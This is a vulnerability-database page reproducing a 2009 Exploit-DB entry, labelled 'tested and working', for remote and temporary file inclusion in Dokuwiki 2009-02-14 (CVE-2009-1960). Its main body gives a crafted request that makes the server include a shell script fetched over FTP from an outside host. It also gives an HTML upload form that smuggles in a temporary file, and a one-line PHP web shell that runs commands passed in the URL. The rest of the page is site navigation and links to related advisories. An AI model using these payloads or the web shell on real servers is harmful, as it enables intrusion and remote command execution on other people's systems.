Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbNine:Situations:GroupEDB-ID:8812
HistoryMay 26, 2009 - 12:00 a.m.

Dokuwiki 2009-02-14 - Temporary/Remote File Inclusion

2009-05-2600:00:00
Nine:Situations:Group
www.exploit-db.com
71

AI Score

7.4

Confidence

Low

JSON
Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
tested and working

I was reading: http://www.milw0rm.com/exploits/8781
by girex

[quote]
It's not a RFI couse use of file_exists function.
[/quote]

How wrong brother!

trick 1 (ftp:// wrapper with php 5):
needs register_globals = on
allow_url_fopen = On (default)
allow_url_include = On (not default)

http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:[email protected]/folder/sh.php&cmd=ls%20-la>out.txt

trick 2:
needs register_globals = on
file_uploads = On (default)

include a temporary file passed by the $_FILES[] array:

<form action="http://[host]/dokuwiki-2009-02-14/doku.php?cmd=ls%20-la" method="post" enctype="multipart/form-data" target="_self">
<input name="config_cascade[main][default][]" type="file">
<input type="submit" value="submit">
</form>

where your shell is like:
<?php passthru($_GET[cmd]); die();?>

because when there is no prefix or suffix for the affected var, it remains like this:
/path_to_temporary_folder/php93.tmp !


Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/

# milw0rm.com [2009-05-26]

Related

ubuntucve 1
exploitdb 1
openvas 5
nessus 3
cvelist 1
debiancve 1
freebsd 1
prion 1
canvas 1
gentoo 1
nvd 1
cve 1
ubuntucve
ubuntucve
CVE-2009-1960
2009-06-08 00:00:00
exploitdb
exploitdb
Dokuwiki 2009-02-14 - Local File Inclusion
2009-05-26 00:00:00
openvas
openvas
FreeBSD Ports: dokuwiki
2009-06-09 00:00:00
DokuWiki 'doku.php' Local File Inclusion Vulnerability
2009-06-19 00:00:00
Gentoo Security Advisory GLSA 200908-09 (dokuwiki)
2009-09-02 00:00:00
nessus
nessus
GLSA-200908-09 : DokuWiki: Local file inclusion
2009-08-20 00:00:00
DokuWiki config_cascade Parameter Remote File Inclusion
2009-05-27 00:00:00
FreeBSD : dokuwiki -- Local File Inclusion with register_globals on (4f838b74-50a1-11de-b01f-001c2514716c)
2009-06-05 00:00:00
cvelist
cvelist
CVE-2009-1960
2009-06-06 18:00:00
debiancve
debiancve
CVE-2009-1960
2009-06-08 01:00:00
freebsd
freebsd
dokuwiki -- Local File Inclusion with register_globals on
2009-05-26 00:00:00
prion
prion
Remote file inclusion
2009-06-08 01:00:00
canvas
canvas
Immunity Canvas: DOKUWIKI_EXEC2
2009-06-08 01:00:00
gentoo
gentoo
DokuWiki: Local file inclusion
2009-08-18 00:00:00
nvd
nvd
CVE-2009-1960
2009-06-08 01:00:00
cve
cve
CVE-2009-1960
2009-06-08 01:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:8812
ubuntucve1exploitdb1openvas5nessus3cvelist1debiancve1freebsd1prion1canvas1gentoo1nvd1cve1